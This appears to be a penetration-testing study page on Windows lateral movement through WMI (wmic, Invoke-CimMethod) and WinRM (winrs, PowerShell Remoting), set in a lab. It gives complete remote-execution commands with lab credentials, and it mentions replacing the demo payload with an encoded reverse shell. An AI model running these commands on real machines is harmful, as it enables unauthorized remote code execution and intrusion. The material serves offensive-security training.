WMI & WinRM

WMI

wmic.exe

Windows Management Instrumentation (WMI) is a built-in Windows feature that allows administrators and scripts to manage and automate tasks across local and remote systems. It uses an object-oriented model and communicates primarily via Remote Procedure Calls (RPC).

From an attacker's perspective, WMI can be exploited to execute commands and spawn processes on remote systems—making it a powerful tool for lateral movement inside a network.

WMI provides a method called Create from the Win32_Process class, which can be used to launch a process on a target system. If an attacker has administrative credentials for a remote machine, they can use this method to execute code remotely. WMI uses port 135 (RPC) for initial communication setup and the dynamic port range (19152–65535) for session data transfer. To execute commands remotely via WMI, attackers often rely on tools like wmic.exe (deprecated but still available in many systems) and PowerShell (Invoke-CimMethod).

Important: Local UAC (User Account Control) restrictions can block remote execution by non-domain users. However, domain users are typically exempt from this, allowing full administrative access remotely.

In our scenario, we simulate an attacker using wmic to launch the Calculator (calc.exe) on a remote system named Files04 (192.168.50.73). The domain user jen connects from Client74 and is a local Administrator on Files04.

> wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5772;
        ReturnValue = 0;
};

The ReturnValue of 0 indicates success.

PowerShell

In modern environments, WMI-based lateral movement with PowerShell (PS) is preferred because it is more flexible, scriptable, and less likely to raise immediate red flags compared to legacy tools like wmic, which has been deprecated.

PS uses CIM (Common Information Model) sessions to remotely interact with system management information on Windows systems—this includes processes, services, registry keys, and more.

CIM is a standardized data model for describing the structure and behavior of managed resources like operating systems and network devices.

A CIM session in PS is a persistent connection to a remote computer that allows you to send WMI-like commands and receive structured responses. CIM sessions can communicate over two main protocols:

DCOM (Distributed Component Object Model): This is the legacy protocol used by traditional WMI commands like wmic or Get-WmiObject. It works well in internal networks but has limitations in firewall-restricted environments.
WSMan (Web Services for Management): This is a newer, HTTP-based protocol built on web standards (used by PowerShell Remoting and Get-CimInstance). It's more firewall-friendly and supports encryption and modern authentication.

Before we can establish a remote session, we need to authenticate. PS uses a PSCredential object for this purpose, which securely stores the username and password.

$username = 'jen'
$password = 'Nexus123!'
# Encrypts the password for secure use in memory
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force
# Wraps the credentials for use with authentication-related cmdlets
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString
# Configures the protocol (in this case DCOM)
$options = New-CimSessionOption -Protocol DCOM
# Initiates the session to the target machine
$session = New-CimSession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $options
$command = 'calc'
# Start a new process on the target machine
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $command}

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     3712           0 192.168.50.73

WinRM

An alternative to WMI for remote management on Windows systems is Windows Remote Management (WinRM). WinRM is Microsoft's implementation of the WSMan protocol. WinRM operates by sending and receiving XML-formatted messages over HTTP (5985) or HTTPS (5986).

Besides being built into PS, WinRM is also accessible through utilities like winrs (Windows Remote Shell)—a command-line tool that allows you to run commands on a remote machine. To use winrs, the remote user must be a member of either the Administrators or the Remote Management Users group on the target machine.

> winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"
FILES04
corp\jen

We can replace these test commands with more advanced payloads—for example, a base64-encoded PS reverse shell.

PS also includes native WinRM support through a feature called PowerShell Remoting. With this approach, we can create a persistent remote session using the New-PSSession cmdlet and authenticate using a PSCredential object.

$username = 'jen'
$password = 'Nexus123!'
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString

> New-PSSession -ComputerName 192.168.50.73 -Credential $credential

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          192.168.50.73   RemoteMachine   Opened        Microsoft.PowerShell     Available
  
> Enter-PSSession 1
[192.168.50.73]: PS C:\Users\jen\Documents> whoami
corp\jen

[192.168.50.73]: PS C:\Users\jen\Documents> hostname
FILES04

PreviousLateral Movement NextPsExec

Last updated 18 days ago

Was this helpful?